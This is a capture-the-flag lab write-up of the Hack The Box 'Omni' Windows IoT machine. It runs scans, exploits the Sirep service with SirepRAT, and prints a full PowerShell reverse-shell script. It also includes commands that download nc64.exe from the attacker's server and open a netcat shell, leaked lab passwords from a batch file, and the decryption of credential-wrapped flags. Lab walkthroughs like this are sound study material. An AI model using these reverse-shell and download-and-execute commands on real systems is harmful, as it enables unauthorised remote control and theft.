Omni
Introduction:
Omni is probably named omni because there is too much going on with this machine as you can see from the initial scans. There are bunch of open ports and URLs discovered by scans that can lead you to rabit holes. If you do a good recon, you will realize that you are dealing with “Windows Device Portal” which seems like an application/OS geared towards management and monitoring of IOT devices. Once you discover that, finding and exploiting the vulnerability was relatively very easy.
Recon
Nmap scan
1nmap -sS -sC -sV -T4 -O -oN nmap.omni.txt 10.10.10.204
2Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-03 15:31 EST
3Nmap scan report for 10.10.10.204
4Host is up (0.014s latency).
5Not shown: 998 filtered ports
6PORT STATE SERVICE VERSION
7135/tcp open msrpc Microsoft Windows RPC
88080/tcp open upnp Microsoft IIS httpd
9| http-auth:
10| HTTP/1.1 401 Unauthorized\x0D
11|_ Basic realm=Windows Device Portal
12|_http-server-header: Microsoft-HTTPAPI/2.0
13|_http-title: Site doesn't have a title.
14Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
15Device type: general purpose
16Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
17OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
18Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
19No exact OS matches for host (test conditions non-ideal).
20Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
21
22OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
23Nmap done: 1 IP address (1 host up) scanned in 20.25 seconds
24
Port scanner
1(threader3000)
2Enter your target IP address or URL here: 10.10.10.204
3------------------------------------------------------------
4Scanning target 10.10.10.204
5Time started: 2021-01-03 15:31:32.631011
6------------------------------------------------------------
7Port 135 is open
8Port 5985 is open
9Port 8080 is open
10Port 29820 is open
11Port 29819 is open
12Port 29817 is open
13Port scan completed in 0:02:06.609975
14
Enumeration
Nikto scan for web
Port 8080
1nikto -url http://10.10.10.204:8080
2- Nikto v2.1.6
3---------------------------------------------------------------------------
4+ Target IP: 10.10.10.204
5+ Target Hostname: 10.10.10.204
6+ Target Port: 8080
7+ Start Time: 2021-01-03 15:32:39 (GMT-5)
8---------------------------------------------------------------------------
9+ Server: Microsoft-HTTPAPI/2.0
10+ Cookie CSRF-Token created without the httponly flag
11+ The anti-clickjacking X-Frame-Options header is not present.
12+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14+ / - Requires Authentication for realm 'Windows Device Portal'
15+ Default account found for 'Windows Device Portal' at / (ID '', PW '00000000'). Konica/Minolta Di 2010f.
16+ Root page / redirects to: /authorizationrequired.htm
17+ No CGI Directories found (use '-C all' to force check all possible dirs)
18+ OSVDB-3092: /exchange/: This may be interesting (Outlook exchange OWA server?)...
19+ OSVDB-3233: /servlet/sqlcdsn: Netware SQL connector found. All default code should be removed from web servers.
20+ /3rdparty/phpMyAdmin/: phpMyAdmin directory found
21+ /3rdparty/phpmyadmin/: phpMyAdmin directory found
22+ /phpmyadmin/: phpMyAdmin directory found
23+ /pma/: phpMyAdmin directory found
24+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
25+ /jk-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
26+ /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
27+ /host-manager/html: Tomcat Manager / Host Manager interface found (pass protected)
28+ /server-manager/: Mitel Audio and Web Conferencing server manager identified.
29+ /manager/status: Tomcat Server Status interface found (pass protected)
30+ /jk-manager/status: Tomcat Server Status interface found (pass protected)
31+ /admin/status: Tomcat Server Status interface found (pass protected)
32+ /host-manager/status: Tomcat Server Status interface found (pass protected)
33+ /server-info: Apache server-info interface found (protected/forbidden)
34+ /admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
35+ /system/console/configMgr: Adobe Experience Manager OSGi console.
36+ 7870 requests: 1 error(s) and 23 item(s) reported on remote host
37+ End Time: 2021-01-03 15:35:36 (GMT-5) (177 seconds)
38---------------------------------------------------------------------------
39+ 1 host(s) tested
40
Port 5985
1nikto -output nikto.omni.txt -url http://omni.htb:5985
2- Nikto v2.1.6
3---------------------------------------------------------------------------
4+ Target IP: 10.10.10.204
5+ Target Hostname: omni.htb
6+ Target Port: 5985
7+ Start Time: 2021-01-03 19:19:52 (GMT-5)
8---------------------------------------------------------------------------
9+ Server: No banner retrieved
10+ The anti-clickjacking X-Frame-Options header is not present.
11+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
12+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
13+ No CGI Directories found (use '-C all' to force check all possible dirs)
14+ 7786 requests: 0 error(s) and 3 item(s) reported on remote host
15+ End Time: 2021-01-03 19:24:37 (GMT-5) (285 seconds)
16---------------------------------------------------------------------------
17+ 1 host(s) tested
18
The login page is - Windows Device Portal, which seems to be related to IOT.
Tried default creds Administrator/p@ssw0rd but it did not work.
Exploitation
During my research, I came across this paper and RCE exploitation script that exploits the sirep service used by windows iot platform to communicate over the 29820 port.
1(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
2---------
3
4---------
5---------
6# Copyright (c) 1993-2009 Microsoft Corp.
7#
8# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
9#
10# This file contains the mappings of IP addresses to host names. Each
11# entry should be kept on an individual line. The IP address should
12# be placed in the first column followed by the corresponding host name.
13# The IP address and the host name should be separated by at least one
14# space.
15#
16# Additionally, comments (such as these) may be inserted on individual
17# lines or following the machine name denoted by a '#' symbol.
18#
19# For example:
20#
21# 102.54.94.97 rhino.acme.com # source server
22# 38.25.63.10 x.acme.com # x client host
23
24# localhost name resolution is handled within DNS itself.
25# 127.0.0.1 localhost
26# ::1 localhost
27
28---------
29<HResultResult | type: 1, payload length: 4, HResult: 0x0>
30<FileResult | type: 31, payload length: 824, payload peek: 'b'# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# Th''>
31(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$
1
2(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
3---------
4
5---------
6---------
7# Copyright (c) 1993-2009 Microsoft Corp.
8#
9# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
10#
11# This file contains the mappings of IP addresses to host names. Each
12# entry should be kept on an individual line. The IP address should
13# be placed in the first column followed by the corresponding host name.
14# The IP address and the host name should be separated by at least one
15# space.
16#
17# Additionally, comments (such as these) may be inserted on individual
18# lines or following the machine name denoted by a '#' symbol.
19#
20# For example:
21#
22# 102.54.94.97 rhino.acme.com # source server
23# 38.25.63.10 x.acme.com # x client host
24
25# localhost name resolution is handled within DNS itself.
26# 127.0.0.1 localhost
27# ::1 localhost
28
29---------
30<HResultResult | type: 1, payload length: 4, HResult: 0x0>
31<FileResult | type: 31, payload length: 824, payload peek: 'b'# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# Th''>
1(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ file_contents=`cat /oscp/LABs/zerotrust/content/lab/hackthebox/omni/data/mini-reverse.ps1`
2(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ echo $file_contents
3$socket = new-object System.Net.Sockets.TcpClient('10.10.14.25', 4455); if($socket -eq $null){exit 1} $stream = $socket.GetStream(); $writer = new-object System.IO.StreamWriter($stream); $buffer = new-object System.Byte[] 1024; $encoding = new-object System.Text.AsciiEncoding; do { $writer.Flush(); $read = $null; $res = "" while($stream.DataAvailable -or $read -eq $null) { $read = $stream.Read($buffer, 0, 1024) } $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n",""); if(!$out.equals("exit")){ $args = ""; if($out.IndexOf(' ') -gt -1){ $args = $out.substring($out.IndexOf(' ')+1); $out = $out.substring(0,$out.IndexOf(' ')); if($args.split(' ').length -gt 1){ $pinfo = New-Object System.Diagnostics.ProcessStartInfo $pinfo.FileName = "cmd.exe" $pinfo.RedirectStandardError = $true $pinfo.RedirectStandardOutput = $true $pinfo.UseShellExecute = $false $pinfo.Arguments = "/c $out $args" $p = New-Object System.Diagnostics.Process $p.StartInfo = $pinfo $p.Start() | Out-Null $p.WaitForExit() $stdout = $p.StandardOutput.ReadToEnd() $stderr = $p.StandardError.ReadToEnd() if ($p.ExitCode -ne 0) { $res = $stderr } else { $res = $stdout } } else{ $res = (&"$out" "$args") | out-string; } } else{ $res = (&"$out") | out-string; } if($res -ne $null){ $writer.WriteLine($res) } } }While (!$out.equals("exit")) $writer.close(); $socket.close(); $stream.Dispose()
4
5(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb PutFileOnDevice --remote_path "C:\Windows\temp\shell.ps1" --data="$file_contents"
6<HResultResult | type: 1, payload length: 4, HResult: 0x0>
7<HResultResult | type: 1, payload length: 4, HResult: 0x0>
8(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb GetFileFromDevice --remote_path "C:\Windows\temp\shell.ps1" --v
9---------
10
11---------
12---------
13$socket = new-object System.Net.Sockets.TcpClient('10.10.14.25', 4455);
14if($socket -eq $null){exit 1}
15$stream = $socket.GetStream();
16$writer = new-object System.IO.StreamWriter($stream);
17$buffer = new-object System.Byte[] 1024;
18$encoding = new-object System.Text.AsciiEncoding;
19do
20{
21 $writer.Flush();
22 $read = $null;
23 $res = ""
24 while($stream.DataAvailable -or $read -eq $null) {
25 $read = $stream.Read($buffer, 0, 1024)
26 }
27 $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
28 if(!$out.equals("exit")){
29 $args = "";
30 if($out.IndexOf(' ') -gt -1){
31 $args = $out.substring($out.IndexOf(' ')+1);
32 $out = $out.substring(0,$out.IndexOf(' '));
33 if($args.split(' ').length -gt 1){
34 $pinfo = New-Object System.Diagnostics.ProcessStartInfo
35 $pinfo.FileName = "cmd.exe"
36 $pinfo.RedirectStandardError = $true
37 $pinfo.RedirectStandardOutput = $true
38 $pinfo.UseShellExecute = $false
39 $pinfo.Arguments = "/c $out $args"
40 $p = New-Object System.Diagnostics.Process
41 $p.StartInfo = $pinfo
42 $p.Start() | Out-Null
43 $p.WaitForExit()
44 $stdout = $p.StandardOutput.ReadToEnd()
45 $stderr = $p.StandardError.ReadToEnd()
46 if ($p.ExitCode -ne 0) {
47 $res = $stderr
48 } else {
49 $res = $stdout
50 }
51 }
52 else{
53 $res = (&"$out" "$args") | out-string;
54 }
55 }
56 else{
57 $res = (&"$out") | out-string;
58 }
59 if($res -ne $null){
60 $writer.WriteLine($res)
61 }
62 }
63}While (!$out.equals("exit"))
64$writer.close();
65$socket.close();
66$stream.Dispose()
67---------
68<HResultResult | type: 1, payload length: 4, HResult: 0x0>
69<FileResult | type: 31, payload length: 13562, payload peek: 'b'$\x00s\x00o\x00c\x00k\x00e\x00t\x00 \x00=\x00 \x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00S\x00y\x00s\x00t\x00''>
70(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$
That didn’t work and I encountered numerous issues so I decided to switch to using nc.
Start a web server using python and host the nc.exe that you can download and run on the target machine. Make sure to start a local listener on your desired port (in my case 4455) to catch the incoming shell -
1(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -Outfile C:\Windows\temp\nc64.exe -URI http://10.10.14.25:8000/nc64.exe" --v
2---------
3
4---------
5---------
6
7---------
8<HResultResult | type: 1, payload length: 4, HResult: 0x0>
9<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00''>
10(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$ python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\temp\\nc64.exe 10.10.14.25 4455 -e powershell.exe" --v
11---------
12
13---------
14<HResultResult | type: 1, payload length: 4, HResult: 0x0>
15(py3) eneloop@kinetic:.../tools/ctftools/SirepRAT$
16
17
18get-childitem -path c:\ -filter *.bat -recurse -erroraction silentlycontinue -force
19
20
21
22PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> type r.bat
23type r.bat
24@echo off
25
26:LOOP
27
28for /F "skip=6" %%i in ('net localgroup "administrators"') do net localgroup "administrators" %%i /delete
29
30net user app mesh5143
31net user administrator _1nt3rn37ofTh1nGz
32
33ping -n 3 127.0.0.1
34
35cls
36
37GOTO :LOOP
38
39PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement>
40get-childitem -path c:\ -filter user.txt -recurse -erroraction silentlycontinue -force
41
42get-childitem -path c:\ -filter root.txt -recurse -erroraction silentlycontinue -force
43
44
45
46PS C:\Data> cd ..
47cd ..
48PS C:\> cd Windows
49cd Windows
50PS C:\Windows> cd temp
51cd temp
52PS C:\Windows\temp> dir
53dir
54
55
56 Directory: C:\Windows\temp
57
58
59Mode LastWriteTime Length Name
60---- ------------- ------ ----
61-a---- 1/4/2021 1:56 AM 45272 nc.exe
62-a---- 1/4/2021 2:08 AM 45272 nc64.exe
63-a---- 1/3/2021 11:53 PM 65536 shell.ps1
64
65
66PS C:\Windows\temp> cp nc64.exe ../System32/
67cp nc64.exe ../System32/
68PS C:\Windows\temp>
1connect to [10.10.14.25] from (UNKNOWN) [10.10.10.204] 49672
2Windows PowerShell
3Copyright (C) Microsoft Corporation. All rights reserved.
4
5PS C:\windows\system32> getuid
6getuid
7getuid : The term 'getuid' is not recognized as the name of a cmdlet,
8function, script file, or operable program. Check the spelling of the name, or
9if a path was included, verify that the path is correct and try again.
10At line:1 char:1
11+ getuid
12+ ~~~~~~
13 + CategoryInfo : ObjectNotFound: (getuid:String) [], CommandNotFo
14 undException
15 + FullyQualifiedErrorId : CommandNotFoundException
16
17PS C:\windows\system32> $env:username
18$env:username
19Administrator
20PS C:\windows\system32> cd ../..
21cd ../..
22PS C:\> dir
23dir
24
25
26 Directory: C:\
27
28
29Mode LastWriteTime Length Name
30---- ------------- ------ ----
31d----- 7/20/2020 2:36 AM $Reconfig$
32d----l 10/26/2018 11:35 PM Data
33d----- 10/26/2018 11:37 PM Program Files
34d----- 10/26/2018 11:38 PM PROGRAMS
35d----- 10/26/2018 11:37 PM SystemData
36d-r--- 10/26/2018 11:37 PM Users
37d----- 7/3/2020 10:35 PM Windows
Post-exploit/PrivEsc
1PS C:\> cd Users
2cd Users
3PS C:\Users> dir
4dir
5
6
7 Directory: C:\Users
8
9
10Mode LastWriteTime Length Name
11---- ------------- ------ ----
12d-r--- 10/26/2018 11:37 PM Public
13
14
15PS C:\Users> cd Public
16cd Public
17PS C:\> cd Data
18cd Data
19PS C:\Data> dir
20dir
21
22
23 Directory: C:\Data
24
25
26Mode LastWriteTime Length Name
27---- ------------- ------ ----
28d----- 10/26/2018 11:37 PM CrashDump
29d----- 10/26/2018 11:37 PM Logfiles
30d----- 10/26/2018 11:37 PM Programs
31d----- 7/3/2020 11:22 PM SharedData
32d----- 7/3/2020 11:22 PM SystemData
33d----- 10/26/2018 11:38 PM test
34d----- 7/4/2020 7:28 PM Users
35d----- 10/26/2018 11:38 PM Windows
36-a---- 7/4/2020 12:22 AM 0 FirstBoot.Complete
37
38
39PS C:\Data> cd SharedData
40cd SharedData
41PS C:\Data\SharedData> dir
42dir
43
44
45 Directory: C:\Data\SharedData
46
47
48Mode LastWriteTime Length Name
49---- ------------- ------ ----
50d----- 10/26/2018 11:38 PM DuShared
51d----- 7/3/2020 11:24 PM input
52d----- 7/3/2020 11:22 PM ServiceProfiles
Find the user flag
1PS C:\Data\SharedData> get-childitem -path c:\ -filter user.txt -recurse -erroraction silentlycontinue -force
2get-childitem -path c:\ -filter user.txt -recurse -erroraction silentlycontinue -force
3
4
5 Directory: C:\Data\Users\app
6
7
8Mode LastWriteTime Length Name
9---- ------------- ------ ----
10-ar--- 7/4/2020 9:53 PM 1958 user.txt
1PS C:\Data\SharedData> cd C:\Data\Users\app
2cd C:\Data\Users\app
3PS C:\Data\Users\app> type user.txt
4type user.txt
5<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
6 <Obj RefId="0">
7 <TN RefId="0">
8 <T>System.Management.Automation.PSCredential</T>
9 <T>System.Object</T>
10 </TN>
11 <ToString>System.Management.Automation.PSCredential</ToString>
12 <Props>
13 <S N="UserName">flag</S>
14 <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb010000009e131d78fe272140835db3caa288536400000000020000000000106600000001000020000000ca1d29ad4939e04e514d26b9706a29aa403cc131a863dc57d7d69ef398e0731a000000000e8000000002000020000000eec9b13a75b6fd2ea6fd955909f9927dc2e77d41b19adde3951ff936d4a68ed750000000c6cb131e1a37a21b8eef7c34c053d034a3bf86efebefd8ff075f4e1f8cc00ec156fe26b4303047cee7764912eb6f85ee34a386293e78226a766a0e5d7b745a84b8f839dacee4fe6ffb6bb1cb53146c6340000000e3a43dfe678e3c6fc196e434106f1207e25c3b3b0ea37bd9e779cdd92bd44be23aaea507b6cf2b614c7c2e71d211990af0986d008a36c133c36f4da2f9406ae7</SS>
15 </Props>
16 </Obj>
17</Objs>
18PS C:\Data\Users\app> get-childitem -path c:\ -filter root.txt -recurse -erroraction silentlycontinue -force
19get-childitem -path c:\ -filter root.txt -recurse -erroraction silentlycontinue -force
20
21
22 Directory: C:\Data\Users\administrator
23
24
25Mode LastWriteTime Length Name
26---- ------------- ------ ----
27-ar--- 7/4/2020 9:48 PM 1958 root.txt
28
29
30PS C:\Data\Users\app> cd C:\Data\Users\administrator
31cd C:\Data\Users\administrator
32PS C:\Data\Users\administrator> type root.txt
33type root.txt
34
35<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
36 <Obj RefId="0">
37 <TN RefId="0">
38 <T>System.Management.Automation.PSCredential</T>
39 <T>System.Object</T>
40 </TN>
41 <ToString>System.Management.Automation.PSCredential</ToString>
42 <Props>
43 <S N="UserName">flag</S>
44 <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb0100000011d9a9af9398c648be30a7dd764d1f3a000000000200000000001066000000010000200000004f4016524600b3914d83c0f88322cbed77ed3e3477dfdc9df1a2a5822021439b000000000e8000000002000020000000dd198d09b343e3b6fcb9900b77eb64372126aea207594bbe5bb76bf6ac5b57f4500000002e94c4a2d8f0079b37b33a75c6ca83efadabe077816aa2221ff887feb2aa08500f3cf8d8c5b445ba2815c5e9424926fca73fb4462a6a706406e3fc0d148b798c71052fc82db4c4be29ca8f78f0233464400000008537cfaacb6f689ea353aa5b44592cd4963acbf5c2418c31a49bb5c0e76fcc3692adc330a85e8d8d856b62f35d8692437c2f1b40ebbf5971cd260f738dada1a7</SS>
45 </Props>
46 </Obj>
47</Objs>
48
1PS C:\Data\Users\administrator> $credential = Import-CliXml -Path C:\Data\Users\administrator\root.txt
2$credential = Import-CliXml -Path C:\Data\Users\administrator\root.txt
3
4
5PS C:\Data\Users\administrator> $credential.GetNetworkCredential().Password
6$credential.GetNetworkCredential().Password
75dbXXXXXXXXXXXXXXXXXX1d
8
1PS C:\Data\Users\administrator> $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
2 $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
3Import-CliXml : Error occurred during a cryptographic operation.
4At line:1 char:16
5+ $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
6+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
7 + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic
8 Exception
9 + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept
10 ion,Microsoft.PowerShell.Commands.ImportClixmlCommand
11
12
13
14PS C:\Data\Users\administrator> $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
15$credential = Import-CliXml -Path C:\Data\Users\app\user.txt
16Import-CliXml : Error occurred during a cryptographic operation.
17At line:1 char:15
18+ $credential = Import-CliXml -Path C:\Data\Users\app\user.txt
19+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
20 + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic
21 Exception
22 + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept
23 ion,Microsoft.PowerShell.Commands.ImportClixmlCommand
24
1PS C:\Data\Users\administrator> cd C:\Data\Users\app\
2cd C:\Data\Users\app\
3PS C:\Data\Users\app> dir
4dir
5
6
7 Directory: C:\Data\Users\app
8
9
10Mode LastWriteTime Length Name
11---- ------------- ------ ----
12d-r--- 7/4/2020 7:28 PM 3D Objects
13d-r--- 7/4/2020 7:28 PM Documents
14d-r--- 7/4/2020 7:28 PM Downloads
15d----- 7/4/2020 7:28 PM Favorites
16d-r--- 7/4/2020 7:28 PM Music
17d-r--- 7/4/2020 7:28 PM Pictures
18d-r--- 7/4/2020 7:28 PM Videos
19-ar--- 7/4/2020 8:20 PM 344 hardening.txt
20-ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
21-ar--- 7/4/2020 9:53 PM 1958 user.txt
22
23
24PS C:\Data\Users\app> $credential = Import-CliXml user.txt
25$credential = Import-CliXml user.txt
26Import-CliXml : Error occurred during a cryptographic operation.
27At line:1 char:15
28+ $credential = Import-CliXml user.txt
29+ ~~~~~~~~~~~~~~~~~~~~~~
30 + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic
31 Exception
32 + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept
33 ion,Microsoft.PowerShell.Commands.ImportClixmlCommand
34
35PS C:\Data\Users\app> $env:UserName
36$env:UserName
37Administrator
38PS C:\Data\Users\app> UserName^C
39eneloop@kinetic:.../tools/ctftools/SirepRAT$ nc -lvnp 8000
40listening on [any] 8000 ...
41
42
43connect to [10.10.14.25] from (UNKNOWN) [10.10.10.204] 49673
44Windows PowerShell
45Copyright (C) Microsoft Corporation. All rights reserved.
46
47PS C:\windows\system32>
48PS C:\windows\system32>
49PS C:\windows\system32> $env:UserName
50$env:UserName
51app
52PS C:\windows\system32> $credential = Import-CliXml C:\Data\Users\app\user.txt
53$credential = Import-CliXml C:\Data\Users\app\user.txt
54PS C:\windows\system32> $credential.GetNetworkCredential().Password
55$credential.GetNetworkCredential().Password
567cfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXd70
57PS C:\windows\system32>